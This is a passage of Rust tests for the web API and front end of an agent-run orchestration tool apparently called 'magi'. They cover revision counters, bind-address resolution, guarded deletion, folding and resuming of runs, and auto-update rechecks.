7846 phone whose radio slept through a turn learns about it here, as \
7847 does one whose operator started the loop from another device: \
7848 {payload}"
7849 );
7850
7851 let health = f.get("/api/health").await.json();
7858 for key in [
7859 "queue_rev",
7860 "runs_rev",
7861 "questions_rev",
7862 "talks_rev",
7863 "notifications_rev",
7864 "loop_rev",
7865 ] {
7866 assert!(
7867 health[key].is_u64(),
7868 "health is the change stream's fallback and is missing `{key}`: {health}"
7869 );
7870 }
7871 }
7872
7873 #[tokio::test]
7874 async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
7875 let f = Fixture::start().await;
7876 let before = f.get("/api/health").await.json()["talks_rev"]
7877 .as_u64()
7878 .expect("talks_rev");
7879
7880 let talk = seed_talk(&f, "20260904-014455-ab12", "open");
7881 std::thread::sleep(Duration::from_millis(10));
7882 let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
7883 on_disk.turns.push(crate::talk::Turn {
7884 who: crate::talk::Who::Operator,
7885 body: "a new turn".to_owned(),
7886 at: Timestamp::now(),
7887 attachments: Vec::new(),
7888 });
7889 f.talks().put(&mut on_disk).expect("record a turn");
7890
7891 let after = f.get("/api/health").await.json()["talks_rev"]
7892 .as_u64()
7893 .expect("talks_rev");
7894 assert_ne!(
7895 before, after,
7896 "a phone must be able to notice a talk's reply without polling every store"
7897 );
7898 }
7899
7900 #[test]
7901 fn bind_reads_back_from_the_spelling_the_cli_prints() {
7902 for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
7906 assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
7907 }
7908 assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
7909 assert!("everywhere".parse::<Bind>().is_err());
7910 }
7911
7912 #[test]
7913 fn an_explicit_bind_address_is_taken_verbatim() {
7914 let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
7915
7916 let (addr, warning) = resolve_bind(&Bind::Addr(asked));
7917
7918 assert_eq!(addr, asked);
7919 assert!(
7920 warning.is_none(),
7921 "an operator who named an address gets no lecture"
7922 );
7923 }
7924
7925 #[test]
7926 fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
7927 let (addr, warning) = resolve_bind(&Bind::Auto);
7928
7929 match addr {
7936 IpAddr::V4(ip) if is_tailnet(&ip) => {
7937 assert!(warning.is_none(), "a tailnet address needs no warning");
7938 }
7939 other => {
7940 assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
7941 let warning = warning.expect("a fallback has to explain itself");
7942 assert!(
7943 warning.contains("127.0.0.1") && warning.contains("local-only"),
7944 "the warning says what happened and what it costs: {warning}"
7945 );
7946 }
7947 }
7948 }
7949
7950 #[test]
7951 fn only_the_cgnat_block_counts_as_a_tailnet_address() {
7952 assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
7956 assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
7957 assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
7958 assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
7959 assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
7960 }
7961
7962 #[test]
7963 fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
7964 let ids = vec![
7965 "20260902-140501-aaaa".to_owned(),
7966 "20260902-140502-aabb".to_owned(),
7967 ];
7968
7969 let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
7970 let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
7971 let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
7972
7973 assert_eq!(missing.status, StatusCode::NOT_FOUND);
7974 assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
7975 assert_eq!(short, "20260902-140502-aabb");
7976 }
7977 #[tokio::test]
7978 async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
7979 let fx = Fixture::start().await;
7985 let id = panel(
7986 &fx,
7987 "<img src=\"shot.png\">",
7988 &[("shot.png", b"\x89PNG\r\n\x1a\n")],
7989 );
7990
7991 let doc = fx
7993 .get(&format!("/api/questions/{id}/panel/index.html"))
7994 .await;
7995 assert_eq!(doc.status, 200, "{}", doc.body);
7996 assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
7997
7998 let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
7999 assert_eq!(sibling.status, 200, "{}", sibling.body);
8000 assert_eq!(sibling.header("content-type"), Some("image/png"));
8001 assert_eq!(
8002 sibling.header("content-security-policy"),
8003 Some(PANEL_CSP),
8004 "the sibling route must carry the same policy as the asset route"
8005 );
8006
8007 assert_eq!(
8010 fx.head(&format!("/api/questions/{id}/panel")).await.status,
8011 200
8012 );
8013 }
8014
8015 #[test]
8016 fn runs_revision_moves_when_deleting_an_older_run() {
8017 let temp = TempDir::new().expect("tempdir");
8018 let runs = temp.path().join("runs");
8019 std::fs::create_dir_all(&runs).expect("create runs dir");
8020
8021 assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
8022
8023 write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
8024 std::thread::sleep(Duration::from_millis(10));
8025 write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
8026
8027 let rev_before = runs_revision(&runs);
8028 assert!(rev_before > 0);
8029
8030 let old_dir = runs.join("20260901-100000-old1");
8031 std::fs::remove_dir_all(&old_dir).expect("remove old run");
8032
8033 let rev_after = runs_revision(&runs);
8034 assert_ne!(
8035 rev_before, rev_after,
8036 "deleting an older run must change the revision so other clients see the deletion"
8037 );
8038 }
8039
8040 fn write_state(runs: &FsPath, state: &RunState) {
8045 let dir = runs.join(&state.id);
8046 std::fs::create_dir_all(&dir).expect("run dir");
8047 std::fs::write(
8048 dir.join("run.json"),
8049 serde_json::to_string_pretty(state).expect("serialize run"),
8050 )
8051 .expect("write run.json");
8052 }
8053
8054 #[test]
8059 fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
8060 let temp = TempDir::new().expect("tempdir");
8061 let runs = temp.path().join("runs");
8062 std::fs::create_dir_all(&runs).expect("create runs dir");
8063 let mut state = RunState::new(
8064 PathBuf::from("/repo/magi"),
8065 "main".to_owned(),
8066 "0123456789abcdef".to_owned(),
8067 "task".to_owned(),
8068 Config::default(),
8069 );
8070 state.id = "20260902-100000-c0de".to_owned();
8071 write_state(&runs, &state);
8072
8073 let rev_idle = runs_revision(&runs);
8074 std::thread::sleep(Duration::from_millis(10));
8075 state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
8076 write_state(&runs, &state);
8077 let rev_started = runs_revision(&runs);
8078 assert_ne!(
8079 rev_idle, rev_started,
8080 "a seat starting must move the revision"
8081 );
8082
8083 std::thread::sleep(Duration::from_millis(10));
8084 state.seat_finished("judge-1");
8085 write_state(&runs, &state);
8086 let rev_finished = runs_revision(&runs);
8087 assert_ne!(
8088 rev_started, rev_finished,
8089 "and clearing it again must move the revision a second time"
8090 );
8091 }
8092
8093 #[tokio::test]
8094 async fn queue_json_carries_dependency_fields_and_a_hold_clears_them() {
8095 let fx = Fixture::start().await;
8100 let q = fx.queue();
8101
8102 let mut t = Task::new(
8103 "Task".to_owned(),
8104 "Instruction".to_owned(),
8105 PathBuf::from("/repo"),
8106 Source::Human,
8107 );
8108 t.block(
8109 vec!["20260101-000000-dead".to_owned()],
8110 Some("waiting on Task 1".to_owned()),
8111 );
8112 t.answers.push(crate::queue::AnsweredQuestion {
8113 question: "Which backend?".to_owned(),
8114 answer: "SQLite".to_owned(),
8115 });
8116 q.put(&mut t).expect("put t");
8117
8118 let res = fx.get("/api/queue").await;
8119 assert_eq!(res.status, 200);
8120 let list = res.json();
8121 let view = list
8122 .as_array()
8123 .expect("array")
8124 .iter()
8125 .find(|v| v["id"] == t.id)
8126 .expect("task in list");
8127 assert_eq!(view["status_str"], "blocked");
8128 assert_eq!(
8129 view["blocked_by"],
8130 serde_json::json!(["20260101-000000-dead"])
8131 );
8132 assert_eq!(view["block_reason"], "waiting on Task 1");
8133 assert_eq!(view["answers"][0]["question"], "Which backend?");
8134 assert_eq!(view["answers"][0]["answer"], "SQLite");
8135
8136 let res = fx
8140 .post(&format!("/api/queue/{}/hold", t.short()), None)
8141 .await;
8142 assert_eq!(res.status, 200);
8143 let held = res.json();
8144 assert_eq!(held["status_str"], "held");
8145 assert_eq!(held["blocked_by"], serde_json::json!([]));
8146 assert!(held["block_reason"].is_null());
8147 assert_eq!(held["answers"][0]["answer"], "SQLite");
8148 }
8149
8150 #[tokio::test]
8151 async fn queue_json_shows_a_blocked_chain_and_its_stuck_root() {
8152 let fx = Fixture::start().await;
8153 let q = fx.queue();
8154 let mk = |title: &str| {
8155 Task::new(
8156 title.to_owned(),
8157 "Instruction".to_owned(),
8158 PathBuf::from("/repo"),
8159 Source::Human,
8160 )
8161 };
8162 let mut root = mk("root");
8163 root.hold_manual(Some("waiting".to_owned()));
8164 q.put(&mut root).unwrap();
8165 let mut mid = mk("mid");
8166 mid.block(vec![root.id.clone()], None);
8167 q.put(&mut mid).unwrap();
8168 let mut leaf = mk("leaf");
8169 leaf.block(vec![mid.id.clone()], None);
8170 q.put(&mut leaf).unwrap();
8171
8172 let list = fx.get("/api/queue").await.json();
8173 let find = |id: &str| {
8174 list.as_array()
8175 .unwrap()
8176 .iter()
8177 .find(|v| v["id"] == id)
8178 .unwrap()
8179 .clone()
8180 };
8181 let leaf_view = find(&leaf.id);
8182 assert_eq!(
8183 leaf_view["waits_on"],
8184 serde_json::json!([format!("{} (blocked → {} held)", mid.short(), root.short())])
8185 );
8186 assert_eq!(leaf_view["stuck_roots"], serde_json::json!([root.short()]));
8187 assert_eq!(
8188 find(&mid.id)["waits_on"],
8189 serde_json::json!([format!("{} (held)", root.short())])
8190 );
8191 assert_eq!(find(&root.id)["waits_on"], serde_json::json!([]));
8192 }
8193
8194 #[tokio::test]
8195 async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
8196 let fx = Fixture::start().await;
8197 let q = fx.queue();
8198
8199 let mut t1 = Task::new(
8201 "Task 1".to_owned(),
8202 "Instruction 1".to_owned(),
8203 PathBuf::from("/repo"),
8204 Source::Human,
8205 );
8206 let run_id = "20260901-000000-r111";
8207 t1.runs.push(run_id.to_owned());
8208 write_run(&fx.runs(), run_id, RunStatus::Merged);
8209 q.put(&mut t1).expect("put t1");
8210
8211 let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
8213 assert_eq!(res.status, 204);
8214 assert!(res.body.is_empty(), "204 No Content has no body");
8215 assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
8216 assert!(
8217 fx.runs().join(run_id).exists(),
8218 "run directory must not be deleted when its task is deleted"
8219 );
8220
8221 let mut t2 = Task::new(
8223 "Task 2".to_owned(),
8224 "Instruction 2".to_owned(),
8225 PathBuf::from("/repo"),
8226 Source::Human,
8227 );
8228 t2.status = TaskStatus::Running;
8229 q.put(&mut t2).expect("put t2");
8230 let mut beat = crate::daemon::Status::new();
8231 beat.current = vec![crate::daemon::Current {
8232 task: t2.id.clone(),
8233 run: "20260901-000000-r222".to_owned(),
8234 }];
8235 beat.updated_at = jiff::Timestamp::now();
8236 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8237 .expect("publish a heartbeat");
8238 let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
8239 assert_eq!(res.status, 409);
8240 assert!(
8241 res.json()["error"]
8242 .as_str()
8243 .unwrap()
8244 .contains("live daemon")
8245 );
8246 assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
8247
8248 beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
8254 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8255 .expect("leave a stale heartbeat");
8256 let mut t3 = Task::new(
8257 "Task 3".to_owned(),
8258 "Instruction 3".to_owned(),
8259 PathBuf::from("/repo"),
8260 Source::Human,
8261 );
8262 t3.status = TaskStatus::Running;
8263 q.put(&mut t3).expect("put t3");
8264 std::mem::forget(q.claim(&t3.id).expect("claim t3"));
8265 let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
8266 assert_eq!(res.status, 204);
8267 assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
8268 assert!(
8269 q.claim(&t3.id).is_ok(),
8270 "the stale lock went with it, so the id is claimable again"
8271 );
8272
8273 let res = fx.delete("/api/queue/nonexistent").await;
8275 assert_eq!(res.status, 404);
8276 }
8277
8278 #[tokio::test]
8279 async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
8280 let fx = Fixture::start().await;
8281 let runs = fx.runs();
8282
8283 let run_id = "20260901-000000-fold";
8285 let mut state = RunState::new(
8286 PathBuf::from("/repo"),
8287 "main".to_owned(),
8288 "abc".to_owned(),
8289 "instruction".to_owned(),
8290 Config::default(),
8291 );
8292 state.id = run_id.to_owned();
8293 state.status = RunStatus::Merged;
8294 state.candidates.push(crate::run::Candidate {
8295 index: 0,
8296 label: 'A',
8297 agent: "a".to_owned(),
8298 branch: "b".to_owned(),
8299 worktree: PathBuf::from("/w"),
8300 summary: String::new(),
8301 stat: String::new(),
8302 files: 1,
8303 commits: 1,
8304 empty: false,
8305 failed: None,
8306 verified_noop: None,
8307 duration_ms: 0,
8308 folded: true,
8309 });
8310 let dir = runs.join(run_id);
8311 std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
8312 std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
8313 .expect("write artifact");
8314 std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
8315 .expect("write run.json");
8316
8317 let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
8319 assert_eq!(res.status, 204);
8320 assert!(res.body.is_empty(), "204 has no body");
8321 assert!(!dir.exists(), "run directory and artifacts must be deleted");
8322
8323 let run_running = "20260901-000000-rung";
8328 write_run(&runs, run_running, RunStatus::Prep);
8329 let mut beat = crate::daemon::Status::new();
8330 beat.current = vec![crate::daemon::Current {
8331 task: "20260901-000000-task".to_owned(),
8332 run: run_running.to_owned(),
8333 }];
8334 beat.updated_at = jiff::Timestamp::now();
8335 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8336 .expect("publish a heartbeat");
8337 let res = fx.delete(&format!("/api/runs/{run_running}")).await;
8338 assert_eq!(res.status, 409);
8339 assert!(
8340 res.json()["error"]
8341 .as_str()
8342 .unwrap()
8343 .contains("live daemon"),
8344 "the refusal must say who is holding it"
8345 );
8346 assert!(
8347 runs.join(run_running).exists(),
8348 "a run in flight keeps its directory"
8349 );
8350
8351 let run_unfolded = "20260901-000000-unfd";
8353 let mut state2 = RunState::new(
8354 PathBuf::from("/repo"),
8355 "main".to_owned(),
8356 "abc".to_owned(),
8357 "instruction".to_owned(),
8358 Config::default(),
8359 );
8360 state2.id = run_unfolded.to_owned();
8361 state2.status = RunStatus::Ready;
8362 state2.candidates.push(crate::run::Candidate {
8363 index: 0,
8364 label: 'A',
8365 agent: "a".to_owned(),
8366 branch: "b".to_owned(),
8367 worktree: PathBuf::from("/w"),
8368 summary: String::new(),
8369 stat: String::new(),
8370 files: 1,
8371 commits: 1,
8372 empty: false,
8373 failed: None,
8374 verified_noop: None,
8375 duration_ms: 0,
8376 folded: false,
8377 });
8378 let dir2 = runs.join(run_unfolded);
8379 std::fs::create_dir_all(&dir2).expect("create dir2");
8380 std::fs::write(
8381 dir2.join("run.json"),
8382 serde_json::to_string(&state2).unwrap(),
8383 )
8384 .expect("write run.json");
8385
8386 let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
8387 assert_eq!(res.status, 409);
8388 assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
8389 assert!(dir2.exists(), "unfolded run directory is kept");
8390
8391 let res = fx.delete("/api/runs/nonexistent").await;
8393 assert_eq!(res.status, 404);
8394 }
8395
8396 #[test]
8397 fn web_ui_delete_contract_in_front_end() {
8398 assert!(APP_JS.contains("deleteRun:"));
8400 assert!(APP_JS.contains("deleteTask:"));
8401
8402 let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
8404 ..APP_JS.find("function renderRuns").unwrap()];
8405 assert!(!run_cards_slice.to_lowercase().contains("delete"));
8406
8407 assert!(APP_JS.contains("renderRunDelete"));
8409 assert!(APP_JS.contains("runDeleteReason"));
8410 assert!(APP_JS.contains("magi fold"));
8411 assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
8412
8413 assert!(APP_JS.contains("cancel.focus"));
8415 assert!(APP_JS.contains("armedRunDelete"));
8416 assert!(APP_JS.contains("armedDelete"));
8417
8418 assert!(APP_JS.contains("disabled: status === \"running\""));
8420 }
8421
8422 #[test]
8442 fn every_ref_a_run_card_uses_is_one_its_builder_published() {
8443 let build = APP_JS
8444 .find("function createRunCard")
8445 .expect("createRunCard exists");
8446 let update = APP_JS
8447 .find("function updateRunCard")
8448 .expect("updateRunCard exists");
8449 let end = APP_JS
8450 .find("function renderRuns")
8451 .expect("renderRuns exists");
8452
8453 let builder = &APP_JS[build..update];
8455 let open = builder.find("refs = {").expect("createRunCard sets refs");
8456 let literal = &builder[open + "refs = {".len()..];
8457 let close = literal.find('}').expect("the refs literal is closed");
8458 let published: HashSet<&str> = literal[..close]
8459 .split(',')
8460 .filter_map(|entry| entry.split(':').next())
8462 .map(str::trim)
8463 .filter(|name| !name.is_empty())
8464 .collect();
8465 assert!(
8466 published.len() > 5,
8467 "the refs literal did not parse into names: {published:?}"
8468 );
8469
8470 let mut used: Vec<&str> = Vec::new();
8473 let updaters = &APP_JS[update..end];
8474 for (at, _) in updaters.match_indices("r.") {
8475 let before = updaters[..at].chars().next_back();
8478 if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
8479 continue;
8480 }
8481 let rest = &updaters[at + 2..];
8482 let len = rest
8483 .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
8484 .unwrap_or(rest.len());
8485 if len > 0 {
8486 used.push(&rest[..len]);
8487 }
8488 }
8489 assert!(
8490 used.len() > 5,
8491 "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
8492 );
8493
8494 let missing: Vec<&str> = used
8495 .iter()
8496 .copied()
8497 .filter(|name| !published.contains(name))
8498 .collect();
8499 assert!(
8500 missing.is_empty(),
8501 "a run card's updater reaches for {missing:?}, which `createRunCard` \
8502 never put in `refs` - every card will throw and the list will \
8503 render empty under a count line that says otherwise. Published: \
8504 {published:?}"
8505 );
8506 }
8507
8508 #[tokio::test]
8509 async fn folding_from_the_phone_reports_what_it_removed() {
8510 let fx = Fixture::start().await;
8511 let runs = fx.runs();
8512
8513 let id = "20260901-000000-fold";
8517 write_run(&runs, id, RunStatus::Stalled);
8518 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8519 assert_eq!(res.status, 200);
8520 assert_eq!(res.json()["removed_count"], 0);
8521 assert_eq!(res.json()["run"], id);
8522 assert!(
8523 runs.join(id).exists(),
8524 "a fold keeps the run's record; only the worktrees go"
8525 );
8526 }
8527
8528 #[tokio::test]
8529 async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
8530 let fx = Fixture::start().await;
8531 let runs = fx.runs();
8532 let wt = fx.home.path().join("wt").join("magi").join("dead");
8533 let id = "20260901-000000-dead";
8534 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8535 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8536 std::fs::create_dir_all(&wt).expect("worktree dir");
8537
8538 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8539 assert_eq!(res.status, 200, "{}", res.body);
8540 assert!(
8541 res.json()["removed_count"].as_u64().unwrap() > 0,
8542 "the worktree this build could not read a state for still went"
8543 );
8544 assert!(
8545 !runs.join(id).exists(),
8546 "an unreadable run has no candidate list to fold selectively, so \
8547 the whole record goes - same as `magi fold` on the CLI"
8548 );
8549 }
8550
8551 #[tokio::test]
8552 async fn deleting_an_unreadable_run_removes_it_wholesale() {
8553 let fx = Fixture::start().await;
8554 let runs = fx.runs();
8555 let wt = fx.home.path().join("wt").join("magi").join("gone");
8556 let id = "20260901-000000-gone";
8557 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8558 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8559 std::fs::create_dir_all(&wt).expect("worktree dir");
8560
8561 let res = fx.delete(&format!("/api/runs/{id}")).await;
8562 assert_eq!(res.status, 204, "{}", res.body);
8563 assert!(!runs.join(id).exists(), "the broken record is gone");
8564 assert!(!wt.exists(), "its worktree is gone too");
8565 }
8566
8567 #[tokio::test]
8568 async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
8569 let fx = Fixture::start().await;
8570 let runs = fx.runs();
8571 let id = "20260901-000000-live";
8572 write_run(&runs, id, RunStatus::Implementing);
8573
8574 let mut beat = crate::daemon::Status::new();
8575 beat.current = vec![crate::daemon::Current {
8576 task: "20260901-000000-task".to_owned(),
8577 run: id.to_owned(),
8578 }];
8579 beat.updated_at = jiff::Timestamp::now();
8580 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8581 .expect("publish a heartbeat");
8582
8583 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8584 assert_eq!(res.status, 409);
8585 assert!(
8586 res.json()["error"]
8587 .as_str()
8588 .unwrap()
8589 .contains("live daemon"),
8590 "folding under a running agent would pull its worktree away"
8591 );
8592 }
8593
8594 #[tokio::test]
8595 async fn fold_merged_requires_a_pr_url() {
8596 let fx = Fixture::start().await;
8597 let runs = fx.runs();
8598 let id = "20260901-000000-nourl";
8599 write_run(&runs, id, RunStatus::Blocked);
8600
8601 let res = fx
8602 .post(&format!("/api/runs/{id}/fold-merged"), Some("{}"))
8603 .await;
8604 assert_eq!(res.status, 400, "{}", res.body);
8605
8606 let blank = fx
8607 .post(
8608 &format!("/api/runs/{id}/fold-merged"),
8609 Some(r#"{"pr_url":" "}"#),
8610 )
8611 .await;
8612 assert_eq!(blank.status, 400, "{}", blank.body);
8613 }
8614
8615 #[tokio::test]
8616 async fn fold_merged_is_404_for_an_unknown_run() {
8617 let fx = Fixture::start().await;
8618 let res = fx
8619 .post(
8620 "/api/runs/nosuchrun/fold-merged",
8621 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8622 )
8623 .await;
8624 assert_eq!(res.status, 404, "{}", res.body);
8625 }
8626
8627 #[tokio::test]
8628 async fn fold_merged_is_refused_while_a_daemon_is_working_on_the_run() {
8629 let fx = Fixture::start().await;
8630 let runs = fx.runs();
8631 let id = "20260901-000000-livemerge";
8632 write_run(&runs, id, RunStatus::Blocked);
8633
8634 let mut beat = crate::daemon::Status::new();
8635 beat.current = vec![crate::daemon::Current {
8636 task: "20260901-000000-task".to_owned(),
8637 run: id.to_owned(),
8638 }];
8639 beat.updated_at = jiff::Timestamp::now();
8640 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8641 .expect("publish a heartbeat");
8642
8643 let res = fx
8644 .post(
8645 &format!("/api/runs/{id}/fold-merged"),
8646 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8647 )
8648 .await;
8649 assert_eq!(res.status, 409, "{}", res.body);
8650 assert!(
8651 res.json()["error"]
8652 .as_str()
8653 .unwrap()
8654 .contains("live daemon"),
8655 "correcting a run's merge underneath a running agent would race \
8656 whatever it is doing to the same `status`/`merge` fields"
8657 );
8658 }
8659
8660 #[tokio::test]
8665 async fn fold_merged_refuses_a_pull_request_it_cannot_confirm_is_merged() {
8666 let fx = Fixture::start().await;
8667 let runs = fx.runs();
8668 let id = "20260901-000000-unconfirmed";
8669 write_run(&runs, id, RunStatus::Blocked);
8670
8671 let res = fx
8672 .post(
8673 &format!("/api/runs/{id}/fold-merged"),
8674 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8675 )
8676 .await;
8677 assert_eq!(res.status, 400, "{}", res.body);
8678 assert_eq!(
8679 read_run(&runs, id).unwrap().status,
8680 RunStatus::Blocked,
8681 "a pull request that could not be confirmed merged must leave \
8682 the run exactly where it was"
8683 );
8684 }
8685
8686 #[tokio::test]
8687 async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
8688 let fx = Fixture::start().await;
8689 let runs = fx.runs();
8690
8691 for (status, word) in [
8697 (RunStatus::Merged, "merged"),
8698 (RunStatus::Ready, "ready"),
8699 (RunStatus::Failed, "failed"),
8700 ] {
8701 let id = format!("20260901-000000-{}", &word[..4]);
8702 write_run(&runs, &id, status);
8703 let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
8704 assert_eq!(res.status, 409, "{word} must not be resumable");
8705 let err = res.json()["error"].as_str().unwrap().to_owned();
8706 assert!(err.contains(word), "the refusal names the status: {err}");
8707 }
8708
8709 let mid = "20260901-000000-midf";
8714 write_run(&runs, mid, RunStatus::Reviewing);
8715 let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
8716 assert_eq!(res.status, 202, "an interrupted run is resumable");
8717 }
8718
8719 #[tokio::test]
8720 async fn resume_is_refused_while_the_loop_is_running() {
8721 let fx = Fixture::start().await;
8722 let runs = fx.runs();
8723 let stalled = "20260901-000000-stal";
8724 write_run(&runs, stalled, RunStatus::Stalled);
8725
8726 let mut beat = crate::daemon::Status::new();
8730 beat.current = vec![crate::daemon::Current {
8731 task: "20260901-000000-task".to_owned(),
8732 run: "20260901-000000-othr".to_owned(),
8733 }];
8734 beat.updated_at = jiff::Timestamp::now();
8735 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8736 .expect("publish a heartbeat");
8737
8738 let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
8739 assert_eq!(res.status, 409);
8740 let err = res.json()["error"].as_str().unwrap().to_owned();
8741 assert!(err.contains("othr"), "it names what the loop is on: {err}");
8742 assert!(err.contains("stop it first"), "{err}");
8743 }
8744
8745 #[test]
8746 fn a_run_cannot_be_resumed_twice_at_once() {
8747 let home = TempDir::new().expect("temp home");
8748 let ui = Ui::new(
8749 Queue::at(home.path().join("queue")),
8750 Questions::at(home.path().join("questions")),
8751 Talks::at(home.path().join("talks")),
8752 home.path().join("runs"),
8753 home.path().to_path_buf(),
8754 PathBuf::from("/repo"),
8755 )
8756 .with_worktrees_root(home.path().join("wt"));
8757 let first = ui.begin_resume("20260901-000000-once").expect("claimed");
8758 let again = ui.begin_resume("20260901-000000-once");
8759 assert!(again.is_err(), "a second tap must not start a second graph");
8760 drop(first);
8761 assert!(
8762 ui.begin_resume("20260901-000000-once").is_ok(),
8763 "and the claim is released when the attempt ends"
8764 );
8765 }
8766
8767 #[test]
8768 fn talk_thinking_tracks_only_its_held_turn_claim() {
8769 let home = TempDir::new().expect("temp home");
8770 let ui = Ui::new(
8771 Queue::at(home.path().join("queue")),
8772 Questions::at(home.path().join("questions")),
8773 Talks::at(home.path().join("talks")),
8774 home.path().join("runs"),
8775 home.path().to_path_buf(),
8776 PathBuf::from("/repo"),
8777 )
8778 .with_worktrees_root(home.path().join("wt"));
8779 let id = "20260901-000000-once";
8780
8781 assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
8782 let turn = ui.begin_talk_turn(id).expect("claim turn");
8783 assert!(ui.is_thinking(id), "the held guard is reported as thinking");
8784 assert!(
8785 !ui.is_thinking("20260901-000000-other"),
8786 "one talk's turn does not make another talk busy"
8787 );
8788 drop(turn);
8789 assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
8790 }
8791
8792 #[tokio::test]
8793 async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
8794 let fx = Fixture::start().await;
8795 let mut beat = crate::daemon::Status::new();
8799 beat.pid = 4321;
8800 beat.updated_at = jiff::Timestamp::now();
8801 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8802 .expect("publish a heartbeat");
8803
8804 let res = fx.post("/api/upgrade", None).await;
8805 assert_eq!(res.status, 409);
8806 let err = res.json()["error"].as_str().unwrap().to_owned();
8807 assert!(err.contains("4321"), "the refusal names the owner: {err}");
8808 assert!(err.contains("old one against the same queue"), "{err}");
8809 }
8810
8811 #[test]
8818 fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
8819 assert!(!should_spawn_recheck(&crate::config::Update {
8820 mode: UpdateMode::Off,
8821 interval: None,
8822 }));
8823
8824 unsafe {
8827 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8828 }
8829 let killed = should_spawn_recheck(&crate::config::Update {
8830 mode: UpdateMode::Notify,
8831 interval: None,
8832 });
8833 unsafe {
8834 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8835 }
8836 assert!(
8837 !killed,
8838 "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
8839 one-time startup check"
8840 );
8841
8842 assert!(should_spawn_recheck(&crate::config::Update {
8843 mode: UpdateMode::Notify,
8844 interval: None,
8845 }));
8846 }
8847
8848 #[test]
8854 fn recheck_poll_period_tracks_a_short_configured_interval() {
8855 let short = crate::config::Update {
8856 mode: UpdateMode::Notify,
8857 interval: Some("1m".to_owned()),
8858 };
8859 let period = recheck_poll_period(&short);
8860 assert!(
8861 period <= Duration::from_secs(30),
8862 "a one-minute interval must wake the task far sooner than the \
8863 default ceiling, or the deck would not notice within the \
8864 interval the operator configured: got {period:?}"
8865 );
8866
8867 let default = crate::config::Update {
8868 mode: UpdateMode::Notify,
8869 interval: None,
8870 };
8871 assert_eq!(
8872 recheck_poll_period(&default),
8873 UPDATE_RECHECK_POLL_MAX,
8874 "the default day-long interval should poll at the (capped) \
